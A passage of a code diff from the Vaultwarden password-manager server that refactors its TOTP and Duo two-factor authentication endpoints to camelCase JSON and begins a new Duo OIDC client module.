// It should help prevent TOTP disclosure if someone keeps their vault unlocked.
|
||||||
|
// Since it doesn't seem to be used, and also does not cause any issues, lets leave it out of the response.
|
||||||
|
// See: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Auth/Controllers/TwoFactorController.cs#L94
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": enabled,
|
"enabled": enabled,
|
||||||
"Key": key,
|
"key": key,
|
||||||
"Object": "twoFactorAuthenticator"
|
"object": "twoFactorAuthenticator"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EnableAuthenticatorData {
|
struct EnableAuthenticatorData {
|
||||||
Key: String,
|
key: String,
|
||||||
Token: NumberOrString,
|
token: NumberOrString,
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/authenticator", data = "<data>")]
|
#[post("/two-factor/authenticator", data = "<data>")]
|
||||||
async fn activate_authenticator(
|
async fn activate_authenticator(data: Json<EnableAuthenticatorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
data: JsonUpcase<EnableAuthenticatorData>,
|
let data: EnableAuthenticatorData = data.into_inner();
|
||||||
headers: Headers,
|
let key = data.key;
|
||||||
mut conn: DbConn,
|
let token = data.token.into_string();
|
||||||
) -> JsonResult {
|
|
||||||
let data: EnableAuthenticatorData = data.into_inner().data;
|
|
||||||
let key = data.Key;
|
|
||||||
let token = data.Token.into_string();
|
|
||||||
|
|
||||||
let mut user = headers.user;
|
let mut user = headers.user;
|
||||||
|
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash,
|
master_password_hash: data.master_password_hash,
|
||||||
Otp: data.Otp,
|
otp: data.otp,
|
||||||
}
|
}
|
||||||
.validate(&user, true, &mut conn)
|
.validate(&user, true, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
@@ -90,23 +87,19 @@ async fn activate_authenticator(
|
|||||||
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": true,
|
"enabled": true,
|
||||||
"Key": key,
|
"key": key,
|
||||||
"Object": "twoFactorAuthenticator"
|
"object": "twoFactorAuthenticator"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/two-factor/authenticator", data = "<data>")]
|
#[put("/two-factor/authenticator", data = "<data>")]
|
||||||
async fn activate_authenticator_put(
|
async fn activate_authenticator_put(data: Json<EnableAuthenticatorData>, headers: Headers, conn: DbConn) -> JsonResult {
|
||||||
data: JsonUpcase<EnableAuthenticatorData>,
|
|
||||||
headers: Headers,
|
|
||||||
conn: DbConn,
|
|
||||||
) -> JsonResult {
|
|
||||||
activate_authenticator(data, headers, conn).await
|
activate_authenticator(data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn validate_totp_code_str(
|
pub async fn validate_totp_code_str(
|
||||||
user_uuid: &str,
|
user_id: &UserId,
|
||||||
totp_code: &str,
|
totp_code: &str,
|
||||||
secret: &str,
|
secret: &str,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
@@ -116,11 +109,11 @@ pub async fn validate_totp_code_str(
|
|||||||
err!("TOTP code is not a number");
|
err!("TOTP code is not a number");
|
||||||
}
|
}
|
||||||
|
|
||||||
validate_totp_code(user_uuid, totp_code, secret, ip, conn).await
|
validate_totp_code(user_id, totp_code, secret, ip, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn validate_totp_code(
|
pub async fn validate_totp_code(
|
||||||
user_uuid: &str,
|
user_id: &UserId,
|
||||||
totp_code: &str,
|
totp_code: &str,
|
||||||
secret: &str,
|
secret: &str,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
@@ -128,16 +121,15 @@ pub async fn validate_totp_code(
|
|||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
use totp_lite::{totp_custom, Sha1};
|
use totp_lite::{totp_custom, Sha1};
|
||||||
|
|
||||||
let decoded_secret = match BASE32.decode(secret.as_bytes()) {
|
let Ok(decoded_secret) = BASE32.decode(secret.as_bytes()) else {
|
||||||
Ok(s) => s,
|
err!("Invalid TOTP secret")
|
||||||
Err(_) => err!("Invalid TOTP secret"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let mut twofactor =
|
let mut twofactor = match TwoFactor::find_by_user_and_type(user_id, TwoFactorType::Authenticator as i32, conn).await
|
||||||
match TwoFactor::find_by_user_and_type(user_uuid, TwoFactorType::Authenticator as i32, conn).await {
|
{
|
||||||
Some(tf) => tf,
|
Some(tf) => tf,
|
||||||
_ => TwoFactor::new(user_uuid.to_string(), TwoFactorType::Authenticator, secret.to_string()),
|
_ => TwoFactor::new(user_id.clone(), TwoFactorType::Authenticator, secret.to_string()),
|
||||||
};
|
};
|
||||||
|
|
||||||
// The amount of steps back and forward in time
|
// The amount of steps back and forward in time
|
||||||
// Also check if we need to disable time drifted TOTP codes.
|
// Also check if we need to disable time drifted TOTP codes.
|
||||||
@@ -156,20 +148,20 @@ pub async fn validate_totp_code(
|
|||||||
let time = (current_timestamp + step * 30i64) as u64;
|
let time = (current_timestamp + step * 30i64) as u64;
|
||||||
let generated = totp_custom::<Sha1>(30, 6, &decoded_secret, time);
|
let generated = totp_custom::<Sha1>(30, 6, &decoded_secret, time);
|
||||||
|
|
||||||
// Check the the given code equals the generated and if the time_step is larger then the one last used.
|
// Check the given code equals the generated and if the time_step is larger then the one last used.
|
||||||
if generated == totp_code && time_step > i64::from(twofactor.last_used) {
|
if generated == totp_code && time_step > twofactor.last_used {
|
||||||
// If the step does not equals 0 the time is drifted either server or client side.
|
// If the step does not equals 0 the time is drifted either server or client side.
|
||||||
if step != 0 {
|
if step != 0 {
|
||||||
warn!("TOTP Time drift detected. The step offset is {}", step);
|
warn!("TOTP Time drift detected. The step offset is {step}");
|
||||||
}
|
}
|
||||||
|
|
||||||
// Save the last used time step so only totp time steps higher then this one are allowed.
|
// Save the last used time step so only totp time steps higher then this one are allowed.
|
||||||
// This will also save a newly created twofactor if the code is correct.
|
// This will also save a newly created twofactor if the code is correct.
|
||||||
twofactor.last_used = time_step as i32;
|
twofactor.last_used = time_step;
|
||||||
twofactor.save(conn).await?;
|
twofactor.save(conn).await?;
|
||||||
return Ok(());
|
return Ok(());
|
||||||
} else if generated == totp_code && time_step <= i64::from(twofactor.last_used) {
|
} else if generated == totp_code && time_step <= twofactor.last_used {
|
||||||
warn!("This TOTP or a TOTP code within {} steps back or forward has already been used!", steps);
|
warn!("This TOTP or a TOTP code within {steps} steps back or forward has already been used!");
|
||||||
err!(
|
err!(
|
||||||
format!("Invalid TOTP code! Server time: {} IP: {}", current_time.format("%F %T UTC"), ip.ip),
|
format!("Invalid TOTP code! Server time: {} IP: {}", current_time.format("%F %T UTC"), ip.ip),
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
@@ -187,3 +179,47 @@ pub async fn validate_totp_code(
|
|||||||
}
|
}
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Debug, Deserialize)]
|
||||||
|
#[serde(rename_all = "camelCase")]
|
||||||
|
struct DisableAuthenticatorData {
|
||||||
|
key: String,
|
||||||
|
master_password_hash: String,
|
||||||
|
r#type: NumberOrString,
|
||||||
|
}
|
||||||
|
|
||||||
|
#[delete("/two-factor/authenticator", data = "<data>")]
|
||||||
|
async fn disable_authenticator(data: Json<DisableAuthenticatorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
|
let user = headers.user;
|
||||||
|
let type_ = data.r#type.into_i32()?;
|
||||||
|
|
||||||
|
if !user.check_valid_password(&data.master_password_hash) {
|
||||||
|
err!("Invalid password");
|
||||||
|
}
|
||||||
|
|
||||||
|
if let Some(twofactor) = TwoFactor::find_by_user_and_type(&user.uuid, type_, &mut conn).await {
|
||||||
|
if twofactor.data == data.key {
|
||||||
|
twofactor.delete(&mut conn).await?;
|
||||||
|
log_user_event(
|
||||||
|
EventType::UserDisabled2fa as i32,
|
||||||
|
&user.uuid,
|
||||||
|
headers.device.atype,
|
||||||
|
&headers.ip.ip,
|
||||||
|
&mut conn,
|
||||||
|
)
|
||||||
|
.await;
|
||||||
|
} else {
|
||||||
|
err!(format!("TOTP key for user {} does not match recorded value, cannot deactivate", &user.email));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if TwoFactor::find_by_user(&user.uuid, &mut conn).await.is_empty() {
|
||||||
|
super::enforce_2fa_policy(&user, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await?;
|
||||||
|
}
|
||||||
|
|
||||||
|
Ok(Json(json!({
|
||||||
|
"enabled": false,
|
||||||
|
"keys": type_,
|
||||||
|
"object": "twoFactorProvider"
|
||||||
|
})))
|
||||||
|
}
|
||||||
|
|||||||
@@ -5,17 +5,17 @@ use rocket::Route;
|
|||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::log_user_event, core::two_factor::_generate_recover_code, ApiResult, EmptyResult, JsonResult, JsonUpcase,
|
core::log_user_event, core::two_factor::_generate_recover_code, ApiResult, EmptyResult, JsonResult,
|
||||||
PasswordOrOtpData,
|
PasswordOrOtpData,
|
||||||
},
|
},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
crypto,
|
crypto,
|
||||||
db::{
|
db::{
|
||||||
models::{EventType, TwoFactor, TwoFactorType, User},
|
models::{EventType, TwoFactor, TwoFactorType, User, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
error::MapResult,
|
error::MapResult,
|
||||||
util::get_reqwest_client,
|
http_client::make_http_request,
|
||||||
CONFIG,
|
CONFIG,
|
||||||
};
|
};
|
||||||
|
|
||||||
@@ -26,8 +26,8 @@ pub fn routes() -> Vec<Route> {
|
|||||||
#[derive(Serialize, Deserialize)]
|
#[derive(Serialize, Deserialize)]
|
||||||
struct DuoData {
|
struct DuoData {
|
||||||
host: String, // Duo API hostname
|
host: String, // Duo API hostname
|
||||||
ik: String, // integration key
|
ik: String, // client id
|
||||||
sk: String, // secret key
|
sk: String, // client secret
|
||||||
}
|
}
|
||||||
|
|
||||||
impl DuoData {
|
impl DuoData {
|
||||||
@@ -92,8 +92,8 @@ impl DuoStatus {
|
|||||||
const DISABLED_MESSAGE_DEFAULT: &str = "<To use the global Duo keys, please leave these fields untouched>";
|
const DISABLED_MESSAGE_DEFAULT: &str = "<To use the global Duo keys, please leave these fields untouched>";
|
||||||
|
|
||||||
#[post("/two-factor/get-duo", data = "<data>")]
|
#[post("/two-factor/get-duo", data = "<data>")]
|
||||||
async fn get_duo(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_duo(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, false, &mut conn).await?;
|
data.validate(&user, false, &mut conn).await?;
|
||||||
@@ -109,16 +109,19 @@ async fn get_duo(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn
|
|||||||
|
|
||||||
let json = if let Some(data) = data {
|
let json = if let Some(data) = data {
|
||||||
json!({
|
json!({
|
||||||
"Enabled": enabled,
|
"enabled": enabled,
|
||||||
"Host": data.host,
|
"host": data.host,
|
||||||
"SecretKey": data.sk,
|
"clientSecret": data.sk,
|
||||||
"IntegrationKey": data.ik,
|
"clientId": data.ik,
|
||||||
"Object": "twoFactorDuo"
|
"object": "twoFactorDuo"
|
||||||
})
|
})
|
||||||
} else {
|
} else {
|
||||||
json!({
|
json!({
|
||||||
"Enabled": enabled,
|
"enabled": enabled,
|
||||||
"Object": "twoFactorDuo"
|
"host": null,
|
||||||
|
"clientSecret": null,
|
||||||
|
"clientId": null,
|
||||||
|
"object": "twoFactorDuo"
|
||||||
})
|
})
|
||||||
};
|
};
|
||||||
|
|
||||||
@@ -126,21 +129,21 @@ async fn get_duo(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case, dead_code)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EnableDuoData {
|
struct EnableDuoData {
|
||||||
Host: String,
|
host: String,
|
||||||
SecretKey: String,
|
client_secret: String,
|
||||||
IntegrationKey: String,
|
client_id: String,
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
impl From<EnableDuoData> for DuoData {
|
impl From<EnableDuoData> for DuoData {
|
||||||
fn from(d: EnableDuoData) -> Self {
|
fn from(d: EnableDuoData) -> Self {
|
||||||
Self {
|
Self {
|
||||||
host: d.Host,
|
host: d.host,
|
||||||
ik: d.IntegrationKey,
|
ik: d.client_id,
|
||||||
sk: d.SecretKey,
|
sk: d.client_secret,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -151,17 +154,17 @@ fn check_duo_fields_custom(data: &EnableDuoData) -> bool {
|
|||||||
st.is_empty() || s == DISABLED_MESSAGE_DEFAULT
|
st.is_empty() || s == DISABLED_MESSAGE_DEFAULT
|
||||||
}
|
}
|
||||||
|
|
||||||
!empty_or_default(&data.Host) && !empty_or_default(&data.SecretKey) && !empty_or_default(&data.IntegrationKey)
|
!empty_or_default(&data.host) && !empty_or_default(&data.client_secret) && !empty_or_default(&data.client_id)
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/duo", data = "<data>")]
|
#[post("/two-factor/duo", data = "<data>")]
|
||||||
async fn activate_duo(data: JsonUpcase<EnableDuoData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn activate_duo(data: Json<EnableDuoData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: EnableDuoData = data.into_inner().data;
|
let data: EnableDuoData = data.into_inner();
|
||||||
let mut user = headers.user;
|
let mut user = headers.user;
|
||||||
|
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash.clone(),
|
master_password_hash: data.master_password_hash.clone(),
|
||||||
Otp: data.Otp.clone(),
|
otp: data.otp.clone(),
|
||||||
}
|
}
|
||||||
.validate(&user, true, &mut conn)
|
.validate(&user, true, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
@@ -184,16 +187,16 @@ async fn activate_duo(data: JsonUpcase<EnableDuoData>, headers: Headers, mut con
|
|||||||
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": true,
|
"enabled": true,
|
||||||
"Host": data.host,
|
"host": data.host,
|
||||||
"SecretKey": data.sk,
|
"clientSecret": data.sk,
|
||||||
"IntegrationKey": data.ik,
|
"clientId": data.ik,
|
||||||
"Object": "twoFactorDuo"
|
"object": "twoFactorDuo"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/two-factor/duo", data = "<data>")]
|
#[put("/two-factor/duo", data = "<data>")]
|
||||||
async fn activate_duo_put(data: JsonUpcase<EnableDuoData>, headers: Headers, conn: DbConn) -> JsonResult {
|
async fn activate_duo_put(data: Json<EnableDuoData>, headers: Headers, conn: DbConn) -> JsonResult {
|
||||||
activate_duo(data, headers, conn).await
|
activate_duo(data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -202,7 +205,7 @@ async fn duo_api_request(method: &str, path: &str, params: &str, data: &DuoData)
|
|||||||
use std::str::FromStr;
|
use std::str::FromStr;
|
||||||
|
|
||||||
// https://duo.com/docs/authapi#api-details
|
// https://duo.com/docs/authapi#api-details
|
||||||
let url = format!("https://{}{}", &data.host, path);
|
let url = format!("https://{}{path}", &data.host);
|
||||||
let date = Utc::now().to_rfc2822();
|
let date = Utc::now().to_rfc2822();
|
||||||
let username = &data.ik;
|
let username = &data.ik;
|
||||||
let fields = [&date, method, &data.host, path, params];
|
let fields = [&date, method, &data.host, path, params];
|
||||||
@@ -210,10 +213,7 @@ async fn duo_api_request(method: &str, path: &str, params: &str, data: &DuoData)
|
|||||||
|
|
||||||
let m = Method::from_str(method).unwrap_or_default();
|
let m = Method::from_str(method).unwrap_or_default();
|
||||||
|
|
||||||
let client = get_reqwest_client();
|
make_http_request(m, &url)?
|
||||||
|
|
||||||
client
|
|
||||||
.request(m, &url)
|
|
||||||
.basic_auth(username, Some(password))
|
.basic_auth(username, Some(password))
|
||||||
.header(header::USER_AGENT, "vaultwarden:Duo/1.0 (Rust)")
|
.header(header::USER_AGENT, "vaultwarden:Duo/1.0 (Rust)")
|
||||||
.header(header::DATE, date)
|
.header(header::DATE, date)
|
||||||
@@ -231,13 +231,12 @@ const AUTH_PREFIX: &str = "AUTH";
|
|||||||
const DUO_PREFIX: &str = "TX";
|
const DUO_PREFIX: &str = "TX";
|
||||||
const APP_PREFIX: &str = "APP";
|
const APP_PREFIX: &str = "APP";
|
||||||
|
|
||||||
async fn get_user_duo_data(uuid: &str, conn: &mut DbConn) -> DuoStatus {
|
async fn get_user_duo_data(user_id: &UserId, conn: &mut DbConn) -> DuoStatus {
|
||||||
let type_ = TwoFactorType::Duo as i32;
|
let type_ = TwoFactorType::Duo as i32;
|
||||||
|
|
||||||
// If the user doesn't have an entry, disabled
|
// If the user doesn't have an entry, disabled
|
||||||
let twofactor = match TwoFactor::find_by_user_and_type(uuid, type_, conn).await {
|
let Some(twofactor) = TwoFactor::find_by_user_and_type(user_id, type_, conn).await else {
|
||||||
Some(t) => t,
|
return DuoStatus::Disabled(DuoData::global().is_some());
|
||||||
None => return DuoStatus::Disabled(DuoData::global().is_some()),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// If the user has the required values, we use those
|
// If the user has the required values, we use those
|
||||||
@@ -255,14 +254,14 @@ async fn get_user_duo_data(uuid: &str, conn: &mut DbConn) -> DuoStatus {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// let (ik, sk, ak, host) = get_duo_keys();
|
// let (ik, sk, ak, host) = get_duo_keys();
|
||||||
async fn get_duo_keys_email(email: &str, conn: &mut DbConn) -> ApiResult<(String, String, String, String)> {
|
pub(crate) async fn get_duo_keys_email(email: &str, conn: &mut DbConn) -> ApiResult<(String, String, String, String)> {
|
||||||
let data = match User::find_by_mail(email, conn).await {
|
let data = match User::find_by_mail(email, conn).await {
|
||||||
Some(u) => get_user_duo_data(&u.uuid, conn).await.data(),
|
Some(u) => get_user_duo_data(&u.uuid, conn).await.data(),
|
||||||
_ => DuoData::global(),
|
_ => DuoData::global(),
|
||||||
}
|
}
|
||||||
.map_res("Can't fetch Duo Keys")?;
|
.map_res("Can't fetch Duo Keys")?;
|
||||||
|
|
||||||
Ok((data.ik, data.sk, CONFIG.get_duo_akey(), data.host))
|
Ok((data.ik, data.sk, CONFIG.get_duo_akey().await, data.host))
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn generate_duo_signature(email: &str, conn: &mut DbConn) -> ApiResult<(String, String)> {
|
pub async fn generate_duo_signature(email: &str, conn: &mut DbConn) -> ApiResult<(String, String)> {
|
||||||
@@ -278,16 +277,12 @@ pub async fn generate_duo_signature(email: &str, conn: &mut DbConn) -> ApiResult
|
|||||||
|
|
||||||
fn sign_duo_values(key: &str, email: &str, ikey: &str, prefix: &str, expire: i64) -> String {
|
fn sign_duo_values(key: &str, email: &str, ikey: &str, prefix: &str, expire: i64) -> String {
|
||||||
let val = format!("{email}|{ikey}|{expire}");
|
let val = format!("{email}|{ikey}|{expire}");
|
||||||
let cookie = format!("{}|{}", prefix, BASE64.encode(val.as_bytes()));
|
let cookie = format!("{prefix}|{}", BASE64.encode(val.as_bytes()));
|
||||||
|
|
||||||
format!("{}|{}", cookie, crypto::hmac_sign(key, &cookie))
|
format!("{cookie}|{}", crypto::hmac_sign(key, &cookie))
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn validate_duo_login(email: &str, response: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn validate_duo_login(email: &str, response: &str, conn: &mut DbConn) -> EmptyResult {
|
||||||
// email is as entered by the user, so it needs to be normalized before
|
|
||||||
// comparison with auth_user below.
|
|
||||||
let email = &email.to_lowercase();
|
|
||||||
|
|
||||||
let split: Vec<&str> = response.split(':').collect();
|
let split: Vec<&str> = response.split(':').collect();
|
||||||
if split.len() != 2 {
|
if split.len() != 2 {
|
||||||
err!(
|
err!(
|
||||||
@@ -340,14 +335,12 @@ fn parse_duo_values(key: &str, val: &str, ikey: &str, prefix: &str, time: i64) -
|
|||||||
err!("Prefixes don't match")
|
err!("Prefixes don't match")
|
||||||
}
|
}
|
||||||
|
|
||||||
let cookie_vec = match BASE64.decode(u_b64.as_bytes()) {
|
let Ok(cookie_vec) = BASE64.decode(u_b64.as_bytes()) else {
|
||||||
Ok(c) => c,
|
err!("Invalid Duo cookie encoding")
|
||||||
Err(_) => err!("Invalid Duo cookie encoding"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let cookie = match String::from_utf8(cookie_vec) {
|
let Ok(cookie) = String::from_utf8(cookie_vec) else {
|
||||||
Ok(c) => c,
|
err!("Invalid Duo cookie encoding")
|
||||||
Err(_) => err!("Invalid Duo cookie encoding"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let cookie_split: Vec<&str> = cookie.split('|').collect();
|
let cookie_split: Vec<&str> = cookie.split('|').collect();
|
||||||
|
|||||||
495
src/api/core/two_factor/duo_oidc.rs
Normal file
495
src/api/core/two_factor/duo_oidc.rs
Normal file
@@ -0,0 +1,495 @@
|
|||||||
|
use chrono::Utc;
|
||||||
|
use data_encoding::HEXLOWER;
|
||||||
|
use jsonwebtoken::{Algorithm, DecodingKey, EncodingKey, Header, Validation};
|
||||||
|
use reqwest::{header, StatusCode};
|
||||||
|
use ring::digest::{digest, Digest, SHA512_256};
|
||||||
|
use serde::Serialize;
|
||||||
|
use std::collections::HashMap;
|
||||||
|
|
||||||
|
use crate::{
|
||||||
|
api::{core::two_factor::duo::get_duo_keys_email, EmptyResult},
|
||||||
|
crypto,
|
||||||
|
db::{
|
||||||
|
models::{DeviceId, EventType, TwoFactorDuoContext},
|
||||||
|
DbConn, DbPool,
|
||||||
|
},
|
||||||
|
error::Error,
|
||||||
|
http_client::make_http_request,
|
||||||
|
CONFIG,
|
||||||
|
};
|
||||||
|
use url::Url;
|
||||||
|
|
||||||
|
// The location on this service that Duo should redirect users to. For us, this is a bridge
|
||||||
|
// built in to the Bitwarden clients.
|
||||||
|
// See: https://github.com/bitwarden/clients/blob/5fb46df3415aefced0b52f2db86c873962255448/apps/web/src/connectors/duo-redirect.ts
|
||||||
|
const DUO_REDIRECT_LOCATION: &str = "duo-redirect-connector.html";
|
||||||
|
|
||||||
|
// Number of seconds that a JWT we generate for Duo should be valid for.
|
||||||
|
const JWT_VALIDITY_SECS: i64 = 300;
|
||||||
|
|
||||||
|
// Number of seconds that a Duo context stored in the database should be valid for.
|
||||||
|
const CTX_VALIDITY_SECS: i64 = 300;
|
||||||
|
|
||||||
|
// Expected algorithm used by Duo to sign JWTs.
|
||||||
|
const DUO_RESP_SIGNATURE_ALG: Algorithm = Algorithm::HS512;
|
||||||
|
|
||||||
|
// Signature algorithm we're using to sign JWTs for Duo. Must be either HS512 or HS256.
|
||||||
|
const JWT_SIGNATURE_ALG: Algorithm = Algorithm::HS512;
|
||||||
|
|
||||||
|
// Size of random strings for state and nonce. Must be at least 16 characters and at most 1024 characters.
|
||||||
|
// If increasing this above 64, also increase the size of the twofactor_duo_ctx.state and
|
||||||
|
// twofactor_duo_ctx.nonce database columns for postgres and mariadb.
|
||||||
|
const STATE_LENGTH: usize = 64;
|
||||||
|
|
||||||
|
// client_assertion payload for health checks and obtaining MFA results.
|
||||||
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
|
struct ClientAssertion {
|
||||||
|
pub iss: String,
|
||||||
|
pub sub: String,
|
||||||
|
pub aud: String,
|
||||||
|
pub exp: i64,
|
||||||
|
pub jti: String,
|
||||||
|
pub iat: i64,
|
||||||
|
}
|
||||||
|
|
||||||
|
// authorization request payload sent with clients to Duo for MFA
|
||||||
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
|
struct AuthorizationRequest {
|
||||||
|
pub response_type: String,
|
||||||
|
pub scope: String,
|
||||||
|
pub exp: i64,
|
||||||
|
pub client_id: String,
|
||||||
|
pub redirect_uri: String,
|
||||||
|
pub state: String,
|
||||||
|
pub duo_uname: String,
|
||||||
|
pub iss: String,
|
||||||
|
pub aud: String,
|
||||||
|
pub nonce: String,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Duo service health check responses
|
||||||
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
|
#[serde(untagged)]
|
||||||
|
enum HealthCheckResponse {
|
||||||
|
HealthOK {
|
||||||
|
stat: String,
|
||||||
|
},
|
||||||
|
HealthFail {
|
||||||
|
message: String,
|
||||||
|
message_detail: String,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Outer structure of response when exchanging authz code for MFA results
|
||||||
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
|
struct IdTokenResponse {
|
||||||
|
id_token: String, // IdTokenClaims
|
||||||
|
access_token: String,
|
||||||
|
expires_in: i64,
|
||||||
|
token_type: String,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Inner structure of IdTokenResponse.id_token
|
||||||
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
|
struct IdTokenClaims {
|
||||||
|
preferred_username: String,
|
||||||
|
nonce: String,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Duo OIDC Authorization Client
|
||||||
|
// See https://duo.com/docs/oauthapi
|
||||||
|
struct DuoClient {
|
||||||
|
client_id: String, // Duo Client ID (DuoData.ik)
|
||||||
|
client_secret: String, // Duo Client Secret (DuoData.sk)
|
||||||
|
api_host: String, // Duo API hostname (DuoData.host)
|
||||||
|
redirect_uri: String, // URL in this application clients should call for MFA verification
|
||||||
|
}
|
||||||
|
|
||||||
|
impl DuoClient {
|
||||||
|
// Construct a new DuoClient
|
||||||
|
fn new(client_id: String, client_secret: String, api_host: String, redirect_uri: String) -> DuoClient {
|
||||||
|
DuoClient {
|
||||||
|
client_id,
|
||||||
|
client_secret,
|
||||||
|
api_host,
|
||||||
|
redirect_uri,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Generate a client assertion for health checks and authorization code exchange.
|
||||||
|
fn new_client_assertion(&self, url: &str) -> ClientAssertion {
|
||||||
|
let now = Utc::now().timestamp();
|
||||||
|
let jwt_id = crypto::get_random_string_alphanum(STATE_LENGTH);
|
||||||
|
|
||||||
|
ClientAssertion {
|
||||||
|
iss: self.client_id.clone(),
|
||||||
|
sub: self.client_id.clone(),
|
||||||
|
aud: url.to_string(),
|
||||||
|
exp: now + JWT_VALIDITY_SECS,
|
||||||
|
jti: jwt_id,
|
||||||
|
iat: now,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Given a serde-serializable struct, attempt to encode it as a JWT
|
||||||
|
fn encode_duo_jwt<T: Serialize>(&self, jwt_payload: T) -> Result<String, Error> {
|
||||||
|
match jsonwebtoken::encode(
|
||||||
|
&Header::new(JWT_SIGNATURE_ALG),
|
||||||
|
&jwt_payload,
|
||||||
|
&EncodingKey::from_secret(self.client_secret.as_bytes()),
|
||||||
|
) {
|
||||||
|
Ok(token) => Ok(token),
|
||||||
|
Err(e) => err!(format!("Error encoding Duo JWT: {e:?}")),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// "required" health check to verify the integration is configured and Duo's services
|
||||||
|
// are up.
|
||||||
|
// https://duo.com/docs/oauthapi#health-check
|
||||||
|
async fn health_check(&self) -> Result<(), Error> {
|
||||||
|
let health_check_url: String = format!("https://{}/oauth/v1/health_check", self.api_host);
|
||||||
|
|
||||||
|
let jwt_payload = self.new_client_assertion(&health_check_url);
|
||||||
|
|
||||||
|
let token = match self.encode_duo_jwt(jwt_payload) {
|
||||||
|
Ok(token) => token,
|
||||||
|
Err(e) => return Err(e),
|
||||||
|
};
|
||||||
|
|
||||||
|
let mut post_body = HashMap::new();
|
||||||
|
post_body.insert("client_assertion", token);
|
||||||
|
post_body.insert("client_id", self.client_id.clone());
|
||||||
|
|
||||||
|
let res = match make_http_request(reqwest::Method::POST, &health_check_url)?
|
||||||
|
.header(header::USER_AGENT, "vaultwarden:Duo/2.0 (Rust)")
|
||||||
|
.form(&post_body)
|
||||||
|
.send()
|
||||||
|
.await
|
||||||
|
{
|
||||||
|
